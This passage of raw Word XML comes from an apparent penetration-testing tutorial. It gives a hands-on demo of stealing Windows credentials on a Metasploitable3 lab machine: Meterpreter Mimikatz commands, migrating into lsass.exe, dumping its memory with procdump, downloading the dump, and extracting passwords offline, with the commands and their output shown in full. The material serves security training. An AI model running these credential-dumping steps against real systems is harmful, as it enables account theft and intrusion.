        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    livessp           Attempt to retrieve livessp creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B70AA79" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mimikatz_command  Run a custom command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48BE52" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    msv               Attempt to retrieve msv creds (hashes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9FDDF" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ssp               Attempt to retrieve ssp creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D22B0" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    tspkg             Attempt to retrieve tspkg creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486BBD53" w14:textId="51388923" w:rsidR="00201A33" w:rsidRPr="00980E9E" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    wdigest           Attempt to retrieve wdigest creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF2E9B" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A7CD45" w14:textId="76114634" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The version of Mimikatz included in Metasploit is the 1.0 but there is a 2.0 version that was released</w:t>
      </w:r>
      <w:r w:rsidR="004000F3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33AF52" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; wdigest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D9AC96" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BEE17D" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Retrieving wdigest credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD60F0" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>wdigest credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC9993" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>===================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC73B2" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEF3E98" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>AuthID     Package    Domain           User              Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E411946" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>------     -------    ------           ----              --------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427353EB" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0;996      Negotiate  WORKGROUP        METASPLOITABLE3$  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D672EC5" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0;39380    NTLM                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A1195" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0;997      Negotiate  NT AUTHORITY     LOCAL SERVICE     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18016F0D" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0;999      NTLM       WORKGROUP        METASPLOITABLE3$  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E0B1C" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;120922   NTLM       METASPLOITABLE3  sshd_server       D@rj33l1ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCEC4A" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;1606354  NTLM       METASPLOITABLE3  vagrant           vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1081A" w14:textId="77777777" w:rsidR="00004CAA" w:rsidRDefault="00004CAA" w:rsidP="00004CAA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A95BD52" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B38642" w14:textId="42895BDB" w:rsidR="00217E52" w:rsidRDefault="00004CAA" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Note: A Mimikatz-like exists on Linux and</w:t>
      </w:r>
      <w:r w:rsidR="00217E52">
        <w:t xml:space="preserve"> is called mimipenguin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C5C13" w14:textId="6BE2A923" w:rsidR="00A11B1C" w:rsidRDefault="0011101F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Local</w:t>
      </w:r>
      <w:r w:rsidR="00A11B1C">
        <w:t xml:space="preserve"> usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DF8534" w14:textId="33C77A3F" w:rsidR="00A11B1C" w:rsidRDefault="00A11B1C" w:rsidP="00A11B1C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>While Mimikatz first goal is to be used on the target machine, another option is to use it locally. Dumping the LSASS.exe memory and retrieving it to his own machine, an attacker can obtain the passwords without uploading Mimikatz on his target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A98760" w14:textId="6D71F716" w:rsidR="00204EE6" w:rsidRPr="00A11B1C" w:rsidRDefault="00204EE6" w:rsidP="00204EE6">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA13AAA" w14:textId="51CB77AF" w:rsidR="00150CC8" w:rsidRDefault="005708C6" w:rsidP="00150CC8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Let us</w:t>
      </w:r>
      <w:r w:rsidR="00150CC8">
        <w:t xml:space="preserve"> dump LSASS.exe memory and get those password</w:t>
      </w:r>
      <w:r w:rsidR="009D0720">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00150CC8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BB5011" w14:textId="126520FE" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00150CC8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can download Procdump </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00F15AB1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7C4F7" w14:textId="0E3AC7B9" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00150CC8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>First, migrate to lsass.exe process, and upload procdump to the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016FB24" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; migrate 484  # lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD5F75" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Migrating from 5560 to 484...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233DB01" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Migration completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65847E" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7398820E" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; upload procdump64.exe C:\\Windows\\system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC23A56" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uploading  : procdump64.exe -&gt; C:\Windows\system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000CBAE9" w14:textId="272E9895" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uploaded   : procdump64.exe -&gt; C:\Windows\system32\procdump64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B28AA" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A0552F" w14:textId="78C93BE1" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then, dump lsass.exe memory to a file and download it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B80AC" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Windows\system32&gt;procdump64 -ma lsass.exe lsassdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654257F" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>procdump64 -ma lsass.exe lsassdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F38E6" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA6BF7F" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ProcDump v9.0 - Sysinternals process dump utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0D5337" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E23EB" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Sysinternals - www.sysinternals.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4DE64" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40046B02" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[16:54:44] Dump 1 initiated: C:\Windows\system32\lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A0CEA" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[16:54:44] Dump 1 writing: Estimated dump file size is 60 MB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E10AD" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[16:54:47] Dump 1 complete: 60 MB written in 3.3 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E48DE" w14:textId="44306FBA" w:rsidR="00F15AB1" w:rsidRDefault="00080D1A" w:rsidP="00080D1A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[16:54:48] Dump count reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B1268" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRPr="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00080D1A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A87721" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Windows\system32&gt;^Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EEE7A9" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Background channel 2? [y/N]  y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539FA7D" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; download C:\\Windows\\system32\\lsassdump.dmp \root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4B5ACF" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloading: C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7A964" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloaded 1.00 MiB of 57.93 MiB (1.73%): C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189093E0" w14:textId="2C347E52" w:rsidR="00F15AB1" w:rsidRPr="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C554723" w14:textId="5BEE4B14" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloaded 55.00 MiB of 57.93 MiB (94.95%): C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96C357" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloaded 56.00 MiB of 57.93 MiB (96.67%): C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D087DE" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloaded 57.00 MiB of 57.93 MiB (98.4%): C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F93063" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Downloaded 57.93 MiB of 57.93 MiB (100.0%): C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC1E62F" w14:textId="77777777" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] download   : C:\Windows\system32\lsassdump.dmp -&gt; root/lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDCB4D8" w14:textId="52CEDAC7" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208ADE60" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00E44B54">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64ABE074" w14:textId="3958D908" w:rsidR="00E44B54" w:rsidRDefault="00E44B54" w:rsidP="00E44B54">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Now, on your Windows machine, open Mimikatz and load the dump file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077F292D" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B618A" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B9BBD5" w14:textId="197AF8A7" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ## / \ ##  /*** Benjamin DELPY `gentilk</w:t>
      </w:r>
      <w:r w:rsidR="00021BE2">
        <w:t>iwi`(benjamin@gentilkiwi.com</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6067A5E8" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ## \ / ##       &gt; http://blog.gentilkiwi.com/mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035492B9" w14:textId="4FF95EA9" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> '## v ##'   </w:t>
      </w:r>
      <w:r w:rsidR="00686BE9">
        <w:t xml:space="preserve">    Vincent LE TOUX </w:t>
      </w:r>
      <w:r>
        <w:t>(vincent.letoux@gmail.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D63B9" w14:textId="77436DF0" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  '#####'        &gt; http://pingcastle.com / </w:t>
      </w:r>
      <w:r w:rsidR="00A53DF3">
        <w:t>http://mysmartlogon.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A53DF3">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="004C66F1">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>***/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137A9F7" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F805FF0" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mimikatz # sekurlsa::Minidump lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED7A16" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Switch to MINIDUMP : 'lsassdump.dmp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A6AF4" w14:textId="2DA8867C" w:rsidR="00F15AB1" w:rsidRDefault="00F15AB1" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA96C7F" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111D9A37" w14:textId="1B998C55" w:rsidR="00F15AB1" w:rsidRDefault="00956B3F" w:rsidP="00F15AB1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Finally, retrieve the passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F43ED" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mimikatz # sekurlsa::logonPasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BDC4D3" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Opening : 'lsassdump.dmp' file for minidump...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16349172" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BC7E21" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 553046 (00000000:00087056)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3FAF46" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933F0DC" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC1F5C" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BD46E" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185148CB" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 7/9/2018 4:39:46 PM</w:t>
      </w:r>
